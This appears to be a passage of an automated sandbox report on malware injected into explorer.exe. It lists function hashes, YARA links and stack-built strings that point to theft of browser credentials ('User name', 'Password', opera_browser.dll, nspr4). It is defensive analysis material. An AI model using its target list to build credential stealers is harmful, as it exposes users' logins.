Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: D6B18B31528B488EDB65EF68C489AEEB7F1FF98300F50951ED49AC7261EF709405CB86

Function 10803622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

2, xrefs: 10803674
c, xrefs: 10803697
t, xrefs: 108036C8
u, xrefs: 10803661
p, xrefs: 10803690
l, xrefs: 10803682
w, xrefs: 108036B3
l, xrefs: 108036AC
n, xrefs: 108036BA
d, xrefs: 108036CF
e, xrefs: 1080366D
s, xrefs: 10803689
d, xrefs: 1080367B
d, xrefs: 108036A5
l, xrefs: 108036D6
i, xrefs: 1080369E
n, xrefs: 108036C1

Memory Dump Source

Source File: 0000000A.00000002.4489594137.0000000010730000.00000040.80000000.00040000.00000000.sdmp, Offset: 10730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10730000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: 834d2091464c733a39ae197e3c5779d6b48d305d7412720c88140933330a58c3
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: F44193B0B1CB088FDB14DF88A8466AEBBE6FB48700F00426EE449D7245DB759D458BD6

Function 09723622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

s, xrefs: 09723689
l, xrefs: 09723682
d, xrefs: 0972367B
i, xrefs: 0972369E
l, xrefs: 097236D6
p, xrefs: 09723690
2, xrefs: 09723674
c, xrefs: 09723697
n, xrefs: 097236C1
t, xrefs: 097236C8
l, xrefs: 097236AC
u, xrefs: 09723661
d, xrefs: 097236CF
w, xrefs: 097236B3
e, xrefs: 0972366D
d, xrefs: 097236A5
n, xrefs: 097236BA

Memory Dump Source

Source File: 0000000A.00000002.4483141145.0000000009700000.00000040.80000000.00040000.00000000.sdmp, Offset: 09700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9700000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: 4c3fc21e6f74a0b0602a6321b1585433a71216f99fc68662f2efb7a613e869a2
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: F7419071B28B188BDB149F88A4497ADBBE2FB88B00F00426EE409D7245DB7599458BD6

Function 1080AAB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

b, xrefs: 1080AC73
], xrefs: 1080AC3D
l, xrefs: 1080ACE2
n, xrefs: 1080AC98
[, xrefs: 1080ACCD
e, xrefs: 1080ACA0
[, xrefs: 1080AC90
c, xrefs: 1080AC0B
], xrefs: 1080ACA8
D, xrefs: 1080ACDA
l, xrefs: 1080AC35
[, xrefs: 1080ABF6
[, xrefs: 1080AC66
[, xrefs: 1080AC2D

Memory Dump Source

Source File: 0000000A.00000002.4489594137.0000000010730000.00000040.80000000.00040000.00000000.sdmp, Offset: 10730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10730000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: 5da0a1143529ffd5699031cd6b5452961f78a23da20ef892f96d138583bc88ab
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: 8FC15B7521CB098FC758EF28C896AAAF7E1FB94304F40472EA59AC7214DF70A515CB86

Function 0972AAB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

D, xrefs: 0972ACDA
c, xrefs: 0972AC0B
[, xrefs: 0972ACCD
[, xrefs: 0972ABF6
l, xrefs: 0972AC35
[, xrefs: 0972AC2D
], xrefs: 0972ACA8
e, xrefs: 0972ACA0
n, xrefs: 0972AC98
[, xrefs: 0972AC66
l, xrefs: 0972ACE2
[, xrefs: 0972AC90
b, xrefs: 0972AC73
], xrefs: 0972AC3D

Memory Dump Source

Source File: 0000000A.00000002.4483141145.0000000009700000.00000040.80000000.00040000.00000000.sdmp, Offset: 09700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9700000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: ec1526a488495be4e04ba2c6d5c9bba6a0ff17173aa05f9ac2f0b8463568ff40
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: 0BC15A71628B198FC758EF64C489BEAF3E1FB98304F40972E949AC7250DF70A515CB86

Function 1080AF12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

r, xrefs: 1080AF90
r, xrefs: 1080AFA8
r, xrefs: 1080AF88
n, xrefs: 1080AF6B
., xrefs: 1080AF63
r, xrefs: 1080AF98
0, xrefs: 1080AF5B
r, xrefs: 1080AFB8
r, xrefs: 1080AFA0
r, xrefs: 1080AFC0
r, xrefs: 1080AFB0
c, xrefs: 1080AFC8

Memory Dump Source

Source File: 0000000A.00000002.4489594137.0000000010730000.00000040.80000000.00040000.00000000.sdmp, Offset: 10730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10730000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: 35c4fdca26bc19cffed4163373d9b7e9ec5ed16560413a9e00e43ec1b8ddf477
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: 3351B23161C7488FD709DF18D8816AAB7E5FB85700F501A3EE8DBC7255DBB4A906CB82

Function 0972AF12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

0, xrefs: 0972AF5B
r, xrefs: 0972AF88
., xrefs: 0972AF63
r, xrefs: 0972AFA0
r, xrefs: 0972AFC0
r, xrefs: 0972AFB8
c, xrefs: 0972AFC8
r, xrefs: 0972AF90
r, xrefs: 0972AF98
r, xrefs: 0972AFA8
r, xrefs: 0972AFB0
n, xrefs: 0972AF6B

Memory Dump Source

Source File: 0000000A.00000002.4483141145.0000000009700000.00000040.80000000.00040000.00000000.sdmp, Offset: 09700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9700000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: a09bb08f2807382840654dfce5aa4894cdefd9c8e3c15fb7e9d0903940f9ef48
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: 5C51E53152C7488FD71ADF18D4853AAB7E5FB85700F505A2EE8CBC7241DBB49906CB82

Function 108042F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

sspi, xrefs: 10804320
dragon_s.dll, xrefs: 10804614
dll, xrefs: 1080432E
cli., xrefs: 10804327
4.dl, xrefs: 108044DB
opera_browser.dll, xrefs: 10804629
nspr, xrefs: 108044D4
l, xrefs: 108044E2

Memory Dump Source

Source File: 0000000A.00000002.4489594137.0000000010730000.00000040.80000000.00040000.00000000.sdmp, Offset: 10730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10730000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: 2d0ba9160a56dd2258fabea756172d767aa38be2fdaf70e9aacd11634856c849
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: C7C1917562CE198FC758EF6CD856AAAB3E1FB94300F41432DA44AC7259DF70A901CBC5

Function 108042F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

sspi, xrefs: 10804320
dragon_s.dll, xrefs: 10804614
dll, xrefs: 1080432E
cli., xrefs: 10804327
4.dl, xrefs: 108044DB
opera_browser.dll, xrefs: 10804629
nspr, xrefs: 108044D4
l, xrefs: 108044E2

Memory Dump Source

Source File: 0000000A.00000002.4489594137.0000000010730000.00000040.80000000.00040000.00000000.sdmp, Offset: 10730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10730000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: 65595854d1ddb3479e633d3e62194c2c08a7f357bd22e4d4f0e5d2d98f7fde75
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: C2C1907562CE198FC758EF6CD856AAAB3E1FB94300F41432DA44AC7259DF70AA01CBC5

Function 097242F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

cli., xrefs: 09724327
l, xrefs: 097244E2
opera_browser.dll, xrefs: 09724629
sspi, xrefs: 09724320
4.dl, xrefs: 097244DB
dragon_s.dll, xrefs: 09724614
nspr, xrefs: 097244D4
dll, xrefs: 0972432E

Memory Dump Source

Source File: 0000000A.00000002.4483141145.0000000009700000.00000040.80000000.00040000.00000000.sdmp, Offset: 09700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9700000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: e72d14099a64f45ee21ca5258a69025869b6e8b7dd1f7f945cf58d6e6035b9eb
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: 33C18172628A298FC758EF68D459BAAB3E1FB98300F54932D944AC7251DF70DA01CBC5

Function 097242F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

cli., xrefs: 09724327
l, xrefs: 097244E2
opera_browser.dll, xrefs: 09724629
sspi, xrefs: 09724320
4.dl, xrefs: 097244DB
dragon_s.dll, xrefs: 09724614
nspr, xrefs: 097244D4
dll, xrefs: 0972432E

Memory Dump Source

Source File: 0000000A.00000002.4483141145.0000000009700000.00000040.80000000.00040000.00000000.sdmp, Offset: 09700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9700000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: 395b0fca02052e44e721ecccb1a2682a26eb971d4550ab52df822cd1b3c7a045
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: CFC18272628A298FC758EF68D459BEAB3E1FB94300F54932D944AC7251DF70DA01CBC5

Function 10C772F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

4.dl, xrefs: 10C774DB
opera_browser.dll, xrefs: 10C77629
sspi, xrefs: 10C77320
nspr, xrefs: 10C774D4
dragon_s.dll, xrefs: 10C77614
l, xrefs: 10C774E2
dll, xrefs: 10C7732E
cli., xrefs: 10C77327

Memory Dump Source

Source File: 0000000A.00000002.4490030404.0000000010BB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10bb0000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: 7a35e02bd2ba21407448eaae914f2c18af2084713d3f926dff759bd31db8fe56
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: 70C18275618E194FC798DF68D496AEAB3E1FB98304F51832EA45AC7250DF30A901CFC6

Function 10C772F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

4.dl, xrefs: 10C774DB
opera_browser.dll, xrefs: 10C77629
sspi, xrefs: 10C77320
nspr, xrefs: 10C774D4
dragon_s.dll, xrefs: 10C77614
l, xrefs: 10C774E2
dll, xrefs: 10C7732E
cli., xrefs: 10C77327

Memory Dump Source

Source File: 0000000A.00000002.4490030404.0000000010BB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10bb0000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: 62fee2627a3d15a25e595d0b95d827bffe7ccfef13e6cc156668bfb1294d9cfb
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: E0C18275618E194FC798DF68D496AEAB3E1FB98304F51832EA45EC7250DF30A901CF86

Function 10805CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

UR, xrefs: 10805D5F
L: , xrefs: 10805D66
2, xrefs: 10805DE1
Pass, xrefs: 10805D97
name, xrefs: 10805DB2
word, xrefs: 10805D9E
User, xrefs: 10805DAB

Memory Dump Source

Source File: 0000000A.00000002.4489594137.0000000010730000.00000040.80000000.00040000.00000000.sdmp, Offset: 10730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10730000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: 3b33490ac7d65d21c29be87041695da2c24ea26deca865634f72920e0189758f
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: F0A1AE7061CB488FDB18EFA89845BEEB7E1FF88300F40462DE48AD7255EF7495468789

Function 09725CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

User, xrefs: 09725DAB
L: , xrefs: 09725D66
2, xrefs: 09725DE1
name, xrefs: 09725DB2
word, xrefs: 09725D9E
Pass, xrefs: 09725D97
UR, xrefs: 09725D5F

Memory Dump Source

Source File: 0000000A.00000002.4483141145.0000000009700000.00000040.80000000.00040000.00000000.sdmp, Offset: 09700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9700000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: bf8cb1aa31c6217eb7fded95fb15af79e42f58a68509d607b8886ebdee3f04a7
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: 1CA192716287588BDB28EF6894487EEB7E1FF88300F40962EE48AD7291EE709545C785

Function 10C78CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

User, xrefs: 10C78DAB
2, xrefs: 10C78DE1
UR, xrefs: 10C78D5F
Pass, xrefs: 10C78D97
L: , xrefs: 10C78D66
name, xrefs: 10C78DB2
word, xrefs: 10C78D9E

Memory Dump Source

Source File: 0000000A.00000002.4490030404.0000000010BB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10bb0000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: 4141b68e3bcefda86c236ed5713a8b5359b0b5ca6cf2218eb4449885597bdbb8
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: 9BA1D1706187488FDB19DFA8D445BEEB7E1FF88304F40862EE48AD7252EF7095458B89

Function 10805CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

UR, xrefs: 10805D5F
L: , xrefs: 10805D66
2, xrefs: 10805DE1
Pass, xrefs: 10805D97
name, xrefs: 10805DB2
word, xrefs: 10805D9E
User, xrefs: 10805DAB

Memory Dump Source

Source File: 0000000A.00000002.4489594137.0000000010730000.00000040.80000000.00040000.00000000.sdmp, Offset: 10730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10730000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: 8d6f849bfee6c106818f7851bd3288b5d79b73e439272b3de387502e80f71d2c
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: 15918D7061CB488FDB18EFA89845BEEB7E1FF88304F40462DE48AD7245EF7495458789

Function 09725CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

User, xrefs: 09725DAB
L: , xrefs: 09725D66
2, xrefs: 09725DE1
name, xrefs: 09725DB2
word, xrefs: 09725D9E
Pass, xrefs: 09725D97
UR, xrefs: 09725D5F

Memory Dump Source

Source File: 0000000A.00000002.4483141145.0000000009700000.00000040.80000000.00040000.00000000.sdmp, Offset: 09700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9700000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: 0888c40702176e34039f5e063bf3aa17e93a1d8015c87c182cbbc926d453abc8
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: D49193716287588BDB28EF68D444BEEB7E1FF98300F40962EE44AD7251EF708545C785

Function 10C78CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

User, xrefs: 10C78DAB
2, xrefs: 10C78DE1
UR, xrefs: 10C78D5F
Pass, xrefs: 10C78D97
L: , xrefs: 10C78D66
name, xrefs: 10C78DB2
word, xrefs: 10C78D9E

Memory Dump Source

Source File: 0000000A.00000002.4490030404.0000000010BB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10bb0000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: c2dfcb925db7e0b85aea4a10332e5c385c7f51eacb1a93d858b8772d95315185
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: 109190706187488FDB59DFA8D444BEEB7E1FF88304F40862EE48AD7252EF7095458B89

Function 10805352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

v, xrefs: 108054A0
n, xrefs: 108053E7
., xrefs: 108053B0
, xrefs: 1080547C
e, xrefs: 1080548E

Memory Dump Source

Source File: 0000000A.00000002.4489594137.0000000010730000.00000040.80000000.00040000.00000000.sdmp, Offset: 10730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10730000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: 41003a7d05f5fe392e20ebf0b9971661c6c22be1ef05349bc2211ae25d498a6a
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: 3B71A135618B488FD758EFA8C8857AEB7F1FF58304F00062EE44AC7265EB70E9458B85

Function 09725352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

v, xrefs: 097254A0
., xrefs: 097253B0
n, xrefs: 097253E7
e, xrefs: 0972548E
, xrefs: 0972547C

Memory Dump Source

Source File: 0000000A.00000002.4483141145.0000000009700000.00000040.80000000.00040000.00000000.sdmp, Offset: 09700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9700000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: 6f34379bf6e08baf8b2a4e35a77c8ce4eee66972e808e6b639750b9f92316f43
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: 39719232628B488FD758EF68D4887AAB7F1FF58304F10562EE44AC7261EB71D945CB81

Function 10800C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

shel, xrefs: 10800C90
2.dl, xrefs: 10800C64
ole3, xrefs: 10800C5D
dll, xrefs: 10800C9E
l32., xrefs: 10800C97

Memory Dump Source

Source File: 0000000A.00000002.4489594137.0000000010730000.00000040.80000000.00040000.00000000.sdmp, Offset: 10730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10730000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: 2160341a14feb0c07aa72e76cfc710c6c3f01cbd22e18682997d29f5574672c7
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: 0B513EB0918B4C8FDB54DFA8C445AEEB7F1FF58300F40462EA59AE7214EF70A5418B89

Function 09720C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

l32., xrefs: 09720C97
dll, xrefs: 09720C9E
ole3, xrefs: 09720C5D
2.dl, xrefs: 09720C64
shel, xrefs: 09720C90

Memory Dump Source

Source File: 0000000A.00000002.4483141145.0000000009700000.00000040.80000000.00040000.00000000.sdmp, Offset: 09700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9700000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: 67e35f22dac95298b7a2720edffa6966f0b2340e4a9bf2360dd6a9940edfd146
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: 9D513AB1928B4C8BDB65EFA4C044BEEB7F1FF58300F40562E959AE7214EF3095418B89

Function 1080186F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

dll, xrefs: 108018F4
ion., xrefs: 108018EC
\, xrefs: 108019E0
4, xrefs: 108019E9
vers, xrefs: 108018E4

Memory Dump Source

Source File: 0000000A.00000002.4489594137.0000000010730000.00000040.80000000.00040000.00000000.sdmp, Offset: 10730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10730000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: 608db6b027ef4897493ef85227d3d7eb3d673f70cefd2f36252e85bc19029df1
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: 0B41603521DB4C8FCBA5EF2898457EAB7E4FB98311F41462E985EC7244EF30D5058782

Function 0972186F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

dll, xrefs: 097218F4
vers, xrefs: 097218E4
\, xrefs: 097219E0
ion., xrefs: 097218EC
4, xrefs: 097219E9

Memory Dump Source

Source File: 0000000A.00000002.4483141145.0000000009700000.00000040.80000000.00040000.00000000.sdmp, Offset: 09700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9700000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: 7162d76385816f308f1796179dd44c54a2c6a6df1e83e5150fe01dda54c5f4d8
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: FD416D3162CB988FCB75EF2898457EAB7E4FB99301F51562E988EC7240EF30D5458782

Function 108034B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

32.d, xrefs: 108034DA
sspi, xrefs: 1080350E
user, xrefs: 108034D3
dll, xrefs: 1080351C
cli., xrefs: 10803515

Memory Dump Source

Source File: 0000000A.00000002.4489594137.0000000010730000.00000040.80000000.00040000.00000000.sdmp, Offset: 10730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10730000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: 9e2db2decbcdef9838681b484dea2528ba92b7917ba16691c948a6ec68bbebc3
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: 2F418230A1CE0D8FCB94EF58C8967AE77E5FB68300F41856AA84ED7214DA31D940CBC2

Function 097234B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

dll, xrefs: 0972351C
32.d, xrefs: 097234DA
cli., xrefs: 09723515
sspi, xrefs: 0972350E
user, xrefs: 097234D3

Memory Dump Source

Source File: 0000000A.00000002.4483141145.0000000009700000.00000040.80000000.00040000.00000000.sdmp, Offset: 09700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9700000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: 7ee347cfef838f1662732de3ce89bc279420bc4306c81ffb87abe362154c67c4
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: F6419132A28F1D8FCB58EF69C0997AD77E1FB68700F44456AA80ED7200DA35C580CBC6

Function 10C764B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

sspi, xrefs: 10C7650E
cli., xrefs: 10C76515
user, xrefs: 10C764D3
dll, xrefs: 10C7651C
32.d, xrefs: 10C764DA

Memory Dump Source

Source File: 0000000A.00000002.4490030404.0000000010BB0000.00000040.00000001.00040000.00000000.sdmp, Offset: 10BB0000, based on PE: false

Joe Sandbox IDA Plugin

